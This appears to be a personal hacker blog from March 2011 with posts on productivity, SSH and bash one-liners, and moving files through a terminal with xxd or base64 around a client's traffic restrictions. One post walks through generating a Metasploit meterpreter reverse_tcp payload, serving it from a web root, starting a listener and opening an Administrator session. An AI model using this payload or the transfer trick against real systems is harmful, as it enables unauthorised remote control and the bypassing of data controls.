Friday, March 25, 2011

Major Experiment

I decided to delete all of my RSS feeds from google reader. I had over 60 subscriptions that I felt I needed to go through on a daily basis. Well recently, I discovered myself spending too much time on feeds. So, in response, I decided to delete them all to see how my productivity increases.

I have enough friends/chat channels so that I dont miss anything major that is happening in the field. I will edit this blog post with my thoughts/findings regarding this experiment :D

EDIT: So its been less than 24h and I have already been discovering new blogs/reading on things I have been meaning to learn for a while now. I did decide to actually have 3 subscriptions on my reader though(ITS NOT CHEATING I SWEAR). The subscriptions are xkcd, questionable content comic, and woot.com. I dont consider it cheating because those take all of 5 seconds to check and i check them regularly anyway.

Wednesday, March 23, 2011

Generate hashes

Here is a webpage that will generate many different hashes from text.
http://www.insidepro.com/hashes.php

Im still looking for a program that will do that via command line...i should probably just code it myself.

FCC ID Search

Hardware hackers will find this useful:
http://www.fcc.gov/oet/ea/fccid/

Its a webpage that will search the FCC database for the FCC ID you supply it. The results are publicly available files/photos/documentation that the manufacturer uploaded.

useful...

Wednesday, March 16, 2011

Learning yourself

Perhaps the best skill/hack you could possibly do is learning your own system.
How do you think?
why do you think the way you do?
what motivates you?
what makes you lazy?
why do you get angry at certain things? and what can you do to recognize and stop it?
What makes you, you?

Most people will go their entire lives without understanding themselves, and will inherently become their own slaves. But, I firmly believe this one statement:

A man who is God of himself, is a God to others.

There is no large leap, or epiphany that can cause you to fully understand yourself. It all comes in small parts, small epiphanies, specific, and detailed. Good example is what happened to me today. I realized that trying to prioritize multiple items that have multiple levels of importance can mess with my head, therefore, knocking out the simpler, quicker tasks first allows me to only have to worry about a smaller number of items. Now that I have reduced my amount of items from 10 to 3, I only have to devote my attention to 3 items. Which is MUCH easier to handle than 10 different things at once.

May seems very simple and obvious, but when something like that changes how you manage your time, you become more efficient, and have more time to do other things.

Its just a little philosophy that I thought I would impart on anyone whos interested.

Thursday, March 10, 2011

Auto restart your SSH connection

Here is a simple bash one liner that will automatically restart your ssh connection if it drops.

while true; do ssh user@server.com; sleep 15; done

It's simple, this will run until killed. The first thing the loop does is start up ssh and since it cant continue until ssh exists, its effectively a method to always restart the connection (without duplicating the process)

This assumes you have key auth setup and ready to go.

TIGERBLOOD

Tuesday, March 8, 2011

Create file from hex dump

So im working on a client and they have the most restrictive traffic rules i've ever seen. I cant transfer any files whatsoever. I figured out I could do this today:

1.xxd NameOfFile
2.copy the output
3.paste it into a file
4.xxd -r file file1
5.open with respective program

Basically what is happening is that you are generating the hex code via xxd and regenerating the binary via xxd -r.

This effectively allows you to transfer files when all you can do is run commands on them.

fuck yeah this makes my life easier.

EDIT: lol i totally forgot turning binaries into text was THE job of the base64 encoding algorithm. so its basically the same steps but with base64...

1. base64 filename
2. copypasta into another file
3. base64 -d newfilename
4. open with respective program

the base64 program has the added benefit of having less to copy/paste over.

Saturday, March 5, 2011

Simple meterpreter call back payload

The following are commands in order to get a meterpreter session contained in a binary that will be run by the target system to connect back to the listener.

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.166 X > /var/www/rawr.exe

Whats happening here? well the first thing we are doing is generating the actual payload that the victim will execute. Note: we are not actually exploiting any vulnerability here, this binary simply contains the meterpreter reverse TCP connect payload (windows/meterpreter/reverse_tcp). You have to set LHOST to the actual listening box (i know, counterintuitive). X is the shortcut to "exploit" in metasploit. Normally msfpayload outputs the binary contents to stdout so you can redirect it wherever you want, here i just redirect it to rawr.exe in my web root directory so I can download it via a web browser.

What happens now (once i start apache) is I go to the victim machine, and type "http://192.168.1.166/rawr.exe" in order to download it. Once downloaded, i run it.
NOTE===============
You need to run the following command before you run the windows binary (otherwise it will connect to nothing and you will have to re-execute the binary)

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.166 E

This command starts up metasploit with the arguments as conditions. msf will start the multi handler to listen for the connection, the rest of the arguments are the same as the msfpayload command. *now run the windows payload*

what should happen is you should get this:

root@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.166 E
[*] Please wait while we load the module tree...

_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|


=[ metasploit v3.6.0-beta [core:3.6 api:1.0]
+ -- --=[ 647 exploits - 340 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
=[ svn r11879 updated today (2011.03.05)

PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.166
[*] Started reverse handler on 192.168.1.166:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.1.193
[*] Meterpreter session 1 opened (192.168.1.166:4444 -> 192.168.1.193:1393) at Sat Mar 05 02:22:40 -0500 2011

meterpreter > getuid
Server username: WINXP\Administrator

Figure out what alias to create

A simple bash one liner that will read through your bash history and print out your most typed binaries:

history | cut -d ' ' -f 5 | sort | uniq -c | sort -n